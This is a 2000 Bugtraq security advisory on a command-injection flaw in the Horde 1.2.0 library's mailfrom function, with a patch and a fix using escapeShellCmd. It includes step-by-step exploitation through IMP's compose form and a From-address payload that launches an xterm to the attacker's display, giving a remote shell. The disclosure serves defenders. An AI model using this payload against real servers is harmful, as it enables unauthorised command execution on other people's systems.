Date:         Fri, 8 Sep 2000 17:03:36 +0200
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Winter, Christian" <Christian.Winter@COC-AG.DE>
Subject:      horde library bug - unchecked from-address
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

this bug we discovered recently.

***** HORDE 1.2.0 $from-bug and how to exploit with IMP 2.2.0 ******


Disclaimer:
            This is intended as a paper for sysadmins who want to secure
            their systems. It is NOT a how to for scriptkiddies to run
            any attack on a IMP-using site.

            The authors of this text will not be held responsible for
            any damage resulting from others using the documented exploits
            for attacking or invading 3rd parties' computers or networks.


Release Date:
            08/09/2000


Authors:
            Bug found and exploited by Jens "atomi" Steube <js@coc-ag.net>
            Fixed and documentated by Christian "thepoet" Winter
<cw@coc-ag.net>


Affected
Versions:
            The bug was found in the horde library code of Horde 1.2.0.

            Other versions haven't been checked yet. If you are in doubt
that
            your version is also buggy, please contact the horde authors as
            described on http://horde.org.



Description:
            The $from-bug is in the horde library file 'horde.lib',
            (on debian systems installed in /usr/share/horde/lib/horde.lib)
            in line 1108 belonging to function "mailfrom". In this file
            there is a call to "popen" with an unchecked "from:"-line as
            argument. Exact syntax is:

            $mail = popen("$default->path_to_sendmail -i -f$from --
$recipients", 'w');

            If the user passes a string containing the "&" char to the
function as
            $from, commands can be executed under the uid and gid the
webserver is
            running as.
    


Exploit:
            Usually the horde.lib/mailfrom function is called by
            the IMP webmail interface. As IMP also does not check for
            the "&" char, it is passed on to popen(). There are also
            some other software-projects using the hordelib - they
            also could be exploited by the same means.  

            1) Just open an IMP and press Compose to write a new mail
            2) As your From-EMail Adress an exploit $from-line could be:

            &"/usr/X11R6/bin/xterm -display 127.0.0.1:0.0"&

            (Remember most people should replace 127.0.0.1 with their own IP
            and also verify the path to xterm)

            or any other command you want.

            3) enter a recipient
            4) Send message, done.

    

Fix:
            The horde library already provides a function that prevents this
            kind of exploits, called "escapeShellCmd". It is used with the
            "$recipients" var but not with "$from".

            To secure the installed horde it is sufficient to add the
following
            line 1108 in /usr/share/horde/lib/horde.lib:

            $from = escapeShellCmd( $from );

            or download a patch form:

            http://ssl.coc-ag.de/sec/hordelib-1.2.0.frombug.patch


****************************************************************************
******

Greetings
Christian

--
thepoet <cw@coc-ag.net>